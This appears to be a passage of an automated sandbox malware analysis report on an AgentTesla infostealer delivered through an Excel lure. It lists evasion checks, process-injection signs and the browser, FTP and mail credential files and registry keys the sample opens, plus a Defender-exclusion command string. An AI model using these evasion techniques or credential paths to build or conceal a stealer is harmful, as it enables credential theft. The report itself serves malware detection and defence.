Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Document contains OLE streams with high entropy indicating encrypted embedded content

Source: AGG POWER RFQ.xlsx

Stream path 'EncryptedPackage' entropy: 7.99985102724 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tnvLnx.exe PID: 1664, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2908, type: MEMORY
Source: Yara match	File source: Process Memory Space: tnvLnx.exe PID: 764, type: MEMORY

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\vbc.exe	Window / User API: threadDelayed 9674			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Window / User API: threadDelayed 2968			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Window / User API: threadDelayed 9715			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2704	Thread sleep time: -300000s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2864	Thread sleep time: -104524s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2968	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3016	Thread sleep time: -360000s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2312	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2312	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2292	Thread sleep count: 9674 > 30			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 856	Thread sleep count: 65 > 30			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2312	Thread sleep count: 93 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2628	Thread sleep time: -103694s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2612	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2432	Thread sleep time: -300000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2724	Thread sleep time: -5534023222112862s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2724	Thread sleep time: -90000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2676	Thread sleep count: 2968 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2676	Thread sleep count: 198 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2112	Thread sleep time: -104455s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2664	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2548	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2656	Thread sleep time: -300000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 3020	Thread sleep time: -5534023222112862s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 3020	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 260	Thread sleep count: 9715 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2864	Thread sleep count: 31 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 3020	Thread sleep count: 96 > 30			Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Last function: Thread delayed

Contains medium sleeps (>= 30s)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 104524			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Thread delayed: delay time: 103694			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Thread delayed: delay time: 104455			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Thread delayed: delay time: 30000			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Queries a list of all running processes

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process token adjusted: Debug			Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe	Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Memory written: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Memory written: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe base: 400000 value starts with: 4D5A			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: vbc.exe, 00000005.00000002.2366923007.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2366923007.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2366923007.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation			Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation			Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Queries volume information: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Queries volume information: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Queries volume information: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Queries volume information: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Source: Yara match	File source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE

Yara detected AgentTesla

Source: Yara match	File source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2367095229.00000000027E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tnvLnx.exe PID: 1664, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2908, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 1980, type: MEMORY
Source: Yara match	File source: Process Memory Space: tnvLnx.exe PID: 152, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 1980, type: MEMORY
Source: Yara match	File source: Process Memory Space: tnvLnx.exe PID: 152, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Source: Yara match	File source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
